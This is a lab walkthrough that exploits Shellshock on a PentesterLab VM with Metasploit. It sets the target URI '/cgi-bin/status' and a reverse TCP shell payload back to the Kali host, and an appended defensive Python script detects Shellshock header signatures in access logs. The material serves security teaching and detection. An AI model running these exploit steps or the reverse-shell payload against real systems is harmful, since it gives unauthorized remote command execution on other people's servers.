First, we must create a NAT Network by going to File > Preferences.
Next, set both your Kali VM and the vulnerable VM to use NAT Network instead of NAT.
Next, check if the vulnerable VM is online by entering its IP in your Kali’s browser.
Next, turn on your Kali Linux and use the browser to check if the vulnerable server is active.
Next, open up Metasploit by typing msfconsole.
After opening Metasploit, type search shellshock to find the Shellshock exploit.
After finding the specific exploit, use it by typing “use ‘exploit filepath’”.
Then, type show options to display the required info that still needs to be entered.
As you can see, targeturi and rhost are still empty, so we must fill them in by typing “set rhost ‘ipofvulnerable’” and then “set targeturi ‘/cgi-bin/status’”. The targeturi is ‘/cgi-bin/status’ because that is where the shell is located.
Next, we have to set the payload. First list the available payloads by typing “show payloads”, then choose /linux/x86/shell/reverse_tcp as our payload and set it by typing “set payload /linux/x86/shell/reverse_tcp”. We chose reverse TCP because it makes the vulnerable VM connect to the Kali machine instead of the Kali machine requesting a connection to the vulnerable VM.
Next, we type check to see if the target is vulnerable.
Because it says it failed to validate the lhost, we have to set the lhost again by typing “set lhost 10.0.2.15”.
Now, we just need to run the exploit. As you can see, when you type “whoami”, it says pentesterlab.
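
For the defending side of this lab, the sketch below scans the vulnerable server's web access log for the Bash function-definition prefix that Shellshock requests carry in a header. It is an added example, not part of the original walkthrough; the combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re

# Shellshock requests put a Bash function definition, starting "() {", into a
# header value. Spacing between the tokens varies, so match it loosely.
SHELLSHOCK_SIG = re.compile(r"\(\s*\)\s*\{")

# "combined" access-log format (assumed): request line, status, size,
# then the quoted Referer and User-Agent header values.
COMBINED = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

def find_shellshock_attempts(lines, cgi_prefix="/cgi-bin/"):
    """Return one record per log line whose logged headers carry the signature."""
    hits = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        headers = {"referer": m.group("referer"), "agent": m.group("agent")}
        flagged = [name for name, value in headers.items()
                   if SHELLSHOCK_SIG.search(value)]
        if flagged:
            hits.append({
                "src": m.group("src"),
                "path": m.group("path"),
                "status": m.group("status"),
                "fields": flagged,
                # Only requests that reach a CGI script hand headers to Bash.
                "cgi_target": m.group("path").startswith(cgi_prefix),
            })
    return hits

# Constructed sample lines; the command part of each header is a placeholder.
SAMPLE_LOG = [
    '10.0.2.15 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 175 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 175 "-" "() { :; }; <constructed placeholder>"',
    '10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "(){ :;}; <constructed placeholder>" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(hit)
```

The combined format records only the Referer and User-Agent headers, so a request that carries the function definition in any other header will not appear in this log and has to be caught at a proxy, WAF or packet capture instead.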